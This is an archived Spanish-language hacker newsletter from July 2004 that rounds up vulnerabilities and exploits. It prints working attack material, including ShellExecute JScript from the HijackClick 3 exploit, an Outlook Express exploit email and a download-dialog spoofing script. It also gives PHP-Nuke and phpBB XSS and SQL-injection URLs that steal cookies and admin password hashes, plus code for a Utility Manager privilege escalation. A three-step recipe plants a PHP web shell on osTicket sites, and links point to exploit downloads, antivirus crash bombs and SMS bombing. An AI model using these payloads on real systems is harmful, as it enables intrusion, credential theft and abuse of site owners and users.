|
Mostrando mensaje 166
|
|
< Anterior | Siguiente >
|
|
|
| Asunto: | [NewsLCU] MySQL bypass, ADODB.Stream, HijackClick3, OE Exploit, IE Spoof, PHPNuked, MS Utiliy Manager, etc | | Fecha: | Domingo, 25 de Julio, 2004 16:54:38 (-0300) | | Autor: | Cyervo | lcu.com.ar <info @.......ar>
|
====================================
News Under - by La Covacha Underground
====================================
6073 Members - Buenos Aires, Argentina
====================================
HTTP://www.LCU.com.ar - 25/07/04
====================================
1] MySQL - Para que usar passwords? [bypass & b0f]
2] ADODB.Stream - qc?
3] HijackClick 3: Nuevo fallo del internet Explorer 6, basado en un viejo
problema
4] Explotando OE [Si, una vez mas]
5] MSIE Spoofeando la ventana de download
6] PHP Nuke Vulns
7] Elevacion de Privilegios @ MS Utility Manager
8] Cool Links
9] Misc
====================================
* http://www.lcu.com.ar con nuevo look ya esta online.
Faltan actualizar un par de secciones y hacer algunos retoques.
Gracias a todos los que respondieron el mail anterior :-)
* Si lees este boletin desde la web, suscribite para recibirlo en tu casilla
de email: http://www.elistas.net/listas/pkaotico
--------------------------------
1] MySQL - Para que usar passwords? [bypass & b0f]
--------------------------------
Los muchachos de NGSSoftware hicieron publica una vulnerabilidad en MySQL
4.1.3 y anteriores + 5.0 en la cual es posible saltearse la autenticacion
[bypass], tambien puede realizarse un b0f y provocar un pseudo DoS en el
servidor.
En el siguiente paper podran encontrar toda la data sobre el tema:
http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
Desde el siguiente link pueden ver una Proof of Concept:
http://www.securiteam.com/exploits/5EP0720DFS.html
Desde este otro enlace, los chicos de SecurityLab [Rusia] postearon un
exploit codeado por ellos, con el cual colocando determinados parametros
podemos tener acceso a todas las bases de datos de un servidor determinado,
desde Windows.
http://www.securitylab.ru/_Exploits/2004/07/mysql_exploit.zip
Sugerimos actualizar MySQL:
http://www.mysql.com
--------------------------------
2] ADODB.Stream - qc?
--------------------------------
Mucho se hablo sobre la vulnerabilidad del ADODB.Stream, el virus, etc, pero
todo separado, dividido y difuso. Vamos a intentar aclarecer el tema:
- Que es ADODB.Stream?
Es un control ActiveX, el cual fue desarrollado con el objetivo de poder
escribir y leer archivos en momoria.
- Y como se relaciona con el navegador Internet Explorer?
Al ser un Active Data Object (ADO), esta intimamente ligado con este
browser, y una falla en ADODB, implica que pueda ser aprovechado desde IE.
- Ok, cual es el problema?
Bueno, el problema real de ADODB.Stream esta en que con un codigo
especialmente estructurado, es posible ejecutar un archivo local del disco
rigido, esta vulnerabilidad existe desde Agosto de 2003 y nunca se saco
ningun parche, porque no era una vulnerabilidad critica.
- Entonces?
La cuestion empieza cuando se descubrio otra vulnerabilidad, en la cual es
posible descargar un archivo sin la conciencia del usuario, hacia su disco
rigido, entonces se hace una combinacion con el bug anterior, y se puede
lograr la descarga&ejecucion de un archivo sin que el usuario sepa de lo
sucedido.
- Parche:
http://windowsupdate.microsoft.com/
http://www.microsoft.com/security/incident/download_ject.mspx
- Analisis:
http://62.131.86.111/analysis.htm
- Exploit:
http://62.131.86.111/security/idiots/repro/exploit.zip
--------------------------------
3] HijackClick 3: Nuevo fallo del internet Explorer 6, basado en un viejo
problema
--------------------------------
Paul del grupo greyhats publicó el dia 12 un exploit para el Internet
Explorer llamado "HijackClick 3"
<http://www.securityfocus.com/archive/1/368652>; en el que mediante un click
se puede añadir una web a los favoritos (en concreto, en el ejemplo se añade
la web del navegador Firefox) y navegar automáticamente hasta la carpeta de
favoritos, lo cual representa una vez mas el primer paso para próximos
exploits mas peligrosos, puesto que demuestra el "acceso al disco duro de
una web", es decir, consigue saltar de la "Zona de seguridad Internet" a la
"Zona de seguridad Mi PC", con los peligros que eso conlleva.
Éste exploit es llamado "HijackClick 3" debido a que está basado en 2
exploits anteriores publicados por "Liu Die Yu" HijackClick. HijackClickV2
La técnica de estos exploits se basa en forzar el evento "drag and drop" .
Previamente se utilizarón las funciones "window.moveBy/To" y
"window.resizeBy/To" . La respuesta de Microsoft fue deshabilitar estas
funciones para que no pudieran ser llamadas mediante un click de ratón.
El nuevo exploit utiliza la función "popup.show()", la función "popup" abre
una ventana con las caracteristicas deseadas y la función "show" puede ser
llamada mediante un click de ratón.
El exploit lo puedes ver aquí:
http://freehost07.websamba.com/greyhats/hijackclick3.htm
La explicación a grandes rasgos del exploit es la siguiente:
Al cargar la página se abre un popup en la ventana principal, y cuando
hagamos click se mueve el popup fuera de la pantalla y se ve la lista de
favoritos en donde antes estaba la página, el efecto resultante es que la
víctima sin darse cuenta, al hacer click, ha arrastrado el link hasta la
carpeta "Mis favoritos", pero en lugar de mover el ratón, lo que se ha
movido ha sido la web.
La función "show()" es utilizada para sacar el popup fuera de la pantalla
(mediante el drag and drop) cuando hacemos click con el ratón.
Ayer "http-equiv" del grupo malware.com publicaba una modificación del
exploit de Paul, con el que utilizando el últimamente famoso comando "shell"
puede ejecutar comandos localmete
<http://www.securityfocus.com/archive/1/368666>;.
El exploit lo puedes ever aquí:
http://www.malware.com/paul.html
Las modificaciones son que en lugar de arrastrar un link, "http-equiv"
utiliza una linea como esta "<img src="greyhat.html ..." (con algo de
bricolaje) para arrastrar el archivo "greyhat.html" y con otra linea como
esta "location="shell:favorites\\greyhat[1].htm" lo ejecuta, como el
"greyhat.html" contiene el truco del comando "shell" para ejecutar código
local, es decir contiene un código como este:
<script language=JScript>
o=new ActiveXObject('Shell.Application');
o.ShellExecute('cmd.exe','/c pause');
</script>
al ejecutar el "greyhat.html" se lanzará a su vez el "cmd.exe"
Fuente: http://cyruxnet.org/news.htm#20040713.1
--------------------------------
4] Explotando OE [Si, una vez mas]
--------------------------------
Microsoft Outlook Express utiliza un control de filtrado para evitar
exploits que abarquen el objeto "window.document", pero si se utiliza otro
componente, oe nos deja hacer lo que queramos.
A continuacion el exploit.eml. Logicamente, deberias programarlo para que
haga lo que quieras, esta seria una prueba para demostrar que realmente
funciona la vulnerabilidad.
-------------[exploit.eml]------------------
From:
To:
Subject:MSOE Scripting Example
Content-Type:text/html
<html>
<body>
<a
href="javascript:opener.setTimeout('execScript(\'alert(document.body.innerHT
ML)\')',1);window.close()" target="_blank">click here</a> to test
</body>
</html>
-------------[/exploit.eml]------------------
Demo: http://freehost07.websamba.com/greyhats/msoeexecscript.htm
--------------------------------
5] MSIE Spoofeando la ventana de download
--------------------------------
Con un pequeño codigo, es posible crear una 'imagen' que reemplace la
ventana de download de un archivo, de cualquier SO, bajo IE.
En el exploit, fue creado para spoofear una ventana de download de Win XP.
-------------[sp00f.htm]------------------
<a href="badfile.exe" onclick="spoofdl()">descargar</a>
<script>
var spoofedfile="sexycoeds.jpg";
var spoofedtype="JPEG Image";
function spoofdl(){ //this thing is so damn persistant :)
var spoofhtml= '\x3Cdiv style="height: 100%; line-height: 21px; font-family:
\'Tahoma\', sans-serif; font-size:
8pt;">'+spoofedfile+'\x3Cbr>'+spoofedtype+'\x3C/div>';
spoofwin= window.createPopup();
spoofwin.document.body.innerHTML= spoofhtml;
spoofwin.document.body.style.margin= 0;
spoofwin.document.body.onunload=spoofdl;
spoofwin.document.body.style.backgroundColor="#EDEADA";
spoofwin.show(screen.width/2-59,screen.height/2-68,250,40);
}
</script>
-------------[/sp00f.htm]------------------
Demo: http://freehost07.websamba.com/greyhats/dlwinspoof.htm
Sugiero: http://www.mozilla.org/products/firefox/
--------------------------------
6] PHP Nuke Vulns
--------------------------------
- XSS:
http://site/modules.php?name=Search&sid=[xss code here]
http://site/modules.php?name=Search&query=*&max=[xss code here]
http://site/modules.php?name=Search&query=waraxe&sel1=[xss code
here]&type=comments
http://site/modules.php?name=Search&a=6&query=*&match=[xss code here]
http://site/modules.php?name=Search&query=*&mod3=[xss code here]
En: http://site/modules.php?name=Search
Escribir: 1"><body onload="alert(document.cookie);
- Hash password en MD5
http://site/modules.php?name=Search&type=comments&query=loquesea&instory=/**
/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
- Path Disclousure (implica usuario ;-)
En: http://site/modules.php?name=Search
"**" o "+"
--------------------------------
7] Elevacion de Privilegios @ MS Utility Manager
--------------------------------
The Microsoft Windows 2000 operating system family supports a feature
called Accessibility Options. Accessibility Options are a series of
assistive technologies within Windows that help users with disabilities
access the functions of the operating system. They can be enabled or
disabled using shortcuts built into the operating system or through the
Accessibility Utility Manager. The Accessibility Utility Manager allows
users to start, stop, or monitor accessibility programs such as
Microsoft Magnifier, Narrator, On-Screen Keyboard, etc... The Utility
Manager can be invoked by pressing <Windows key>+U or, if the user is an
Administrator, by executing "utilman.exe /start" from the command line.
The Utility Manager runs as a Windows service enabled by default. When
executed it runs within the interactive desktop with Local System
privileges.
Utility Manager supports context sensitive help which was accessed by
clicking the "?" on the title bar of the Utility Manager window and then
clicking an object or by pressing F1 key after selecting an object. To
display the context sensitive help, Utility Manager loaded
winhlp32.exe. However it did not drop System privileges when doing so
meaning that winhlp32.exe was executed under the Local System account.
Microsoft fixed this vulnerability with patch MS04-011. The patch failed
to fix the problem because it only removed the context sensitive help
from the Utility Manager GUI preventing help from being invoked from the
main screen. However, the patch did not remove/disable the functionality
used by the application to launch the context sensitive help (see ¹ for
more details). Utility Manager continues to load winhlp32.exe without
dropping privileges meaning that winhlp32.exe is still run under Local
System account. A user need only to send several Windows messages and
winhlp32.exe will be launched. From there, the user can open any file
as a Local System account.
To exploit the vulnerability, an attacker would need only to run the
following code:
//get window handle
lHandle=FindWindow(NULL, "Utility Manager");
//send right click on the app button in the taskbar or Alt+Space Bar
PostMessage(lHandle,0x313,NULL,NULL);
Sleep(100);
//send WM_COMMANDHELP 0x0365 lParam must be<>NULL
SendMessage(lHandle,0x365,NULL,0x1);
After this code has been executed, winhlp32.exe will ask the attacker to
locate the umandlg.hlp help file. The attacker can then select "Yes" and
an Open dialog will be shown. The attacker can then search and select
cmd.exe. The attacker will then have a shell running under Local System
privileges.
Note:
It seems that Visual C++ MFC (Microsoft Foundation Class) (see ²) will
automatically include help functionality in an application regardless of
whether or not this functionality will be utilized. Therefore, when
coding desktop applications that will run with elevated privileges,
remove all help functionality or drop account privileges before loading
the help.
Links:
(Previous vulnerability)
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-
B3EB-D2342FBB6C00&displaylang=en
http://www.appsecinc.com/resources/alerts/general/04-0001.html
(Current vulnerability)
1.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vcmfc98/htm
l/_mfcnotes_tn028.asp
2.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vccore98/HT
ML/_core_help.3a_.f1_and_shift.2b.f1_help.asp
3. http://www.microsoft.com/technet/security/bulletin/ms04-019.mspx
Workaround:
Disable Utility Manager Service.
Fix:
http://www.microsoft.com/technet/security/bulletin/ms04-019.mspx
Acknowledgement:
Thanks to Brett Moore and Esteban Martinez Fayo.
Fuente: http://www.securityfocus.com/archive/1/368793
Exploit:
http://www.coromputer.net/files/utilmaned1.c
--------------------------------
8] Cool Links
--------------------------------
- Genera exploits XSS
http://umbrella.name/genxe/index.html
- GreyHats
http://freehost07.websamba.com/greyhats/
- Coromputer
http://www.coromputer.net
- Linux Users Group - Ingenieria de Universidad de Buenos Aires
http://www.lug.fi.uba.ar/ [Slds a Black Witch :]
- The Art of Desception by Mitnick
http://www.madchat.org/esprit/textes/The_Art_of_Deception.pdf
- Minutos antes de la final por la copa america Argentina - Brasil
Millones de Argentinos seguimos sosteniendo al sitio:
http://www.echalo.com.ar y lo que promueve.
--------------------------------
9] Misc
--------------------------------
- PHPbb XSS
http://SERVER/phpBB2/search.php?search_author='<script>alert(document
.cookie)</script>
- Salio la Phrak
http://www.phrack.org/archives/phrack62.tar.gz
- H4x0r34nd0 osTicket en 3 pasos
1.- Buscamos algun sitio que use osTicket. [Hay que saber utilizar g00gle
XD]
http://www.google.com./search?q=%22Main%22+%22Help%22+%22Support+Ticket+Syst
em%22+php+attachment&hl=en&lr=&ie=UTF-8&start=10&sa=N
2.- Enviamos un ticket con un archivo adjunto, el cual podria ser un php que
contenga algo como...
<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd'
size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>
3.- Vamos a /osticket/attachments/
4.- get fun.
- Hay que tirar abajo un Norton AV?
http://www.geocities.com/visitbipin/av_bomb_3.zip
- Hay que tirar abajo un SMS Client de MS?
http://www.securiteam.com/windowsntfocus/5WP0N1FDFW.html
- LCU anticipa el smsbombing en los celulares, al menos con los
servicios de Argentina, es sumamente sencillo, tan solo cuestion de
destripar los flash y javascript, para programar una pagina donde se hagan
multiples envios.
Por cada envio, se baja el saldo entre 13 y 21 centavos.
Por segundo, se pueden enviar dos SMS efectivos y eficaces.
Muy gr0x.
- Sos webmaster?
Cambio de enlaces con lcu: info[@]lcu.com.ar
- "Basta de dialers" dijo Google. Banneo a los sitios de SPA.
- "Basta de 907" dijo Telefonica en España.
Ahora, sin duda al menos en el mundo hispano, habra menos dialers, y los
sitios tendran algo mas de contenido, esperemos que todo contribuya a
mejorar la calidad, y demostrar que se pueden hacer negocios con clase.
- Si les interesa algun tema relacionado con la informatica, plz, no
lean Clarin, sino medios especializados. http://www.lcu.com.ar/ lado derecho
varios cool sites.
- Estrategia China:
"El general que sabe cuando atacar hace que su enemigo no sepa cuando
defenderse." - El Libro de los Cinco Anillos -Manuscrito del Fuego- de
Miyamoto Musashi.
[ Fingir ir hacia el Este mientras se ataca por el Oeste.
Se crea una falsa impresión para hacer pensar al enemigo que el ataque viene
de un lado, cuando en realidad está llegando por otro. El adversario no debe
descubrir las intenciones de los falsos movimientos: si no se hace con
inteligencia, puede volverse contra uno.
En 1.983, se dejó filtrar a la prensa que se estaban enviando aviones de
carga y barcos de EEUU. a Oriente Medio para ayudar a las tropas de
mantenimiento de la paz en el Líbano. En realidad, la flota se dirigió a
Granada, dónde la isla se ocupó con gran rapidez por lo inesperado de la
acción.]
Que tengan un excelente domingo.
CyV [Cyervo]
HTTP://www.lcu.com.ar
msn: info arroba cyv.org.ar
_______________________________________________________________________
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
Elimina esas molestas ventanas popup
Busca en Internet desde el menu de tu navegador
Obten informacion inmediata sobra las paginas que visites
Averigua al instante paginas y sitios relacionados
!! Descarga GRATIS la barra de ALEXA YA !!
Haz clic aqui -> http://elistas.net/ml/143/
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
|
Responder a este mensaje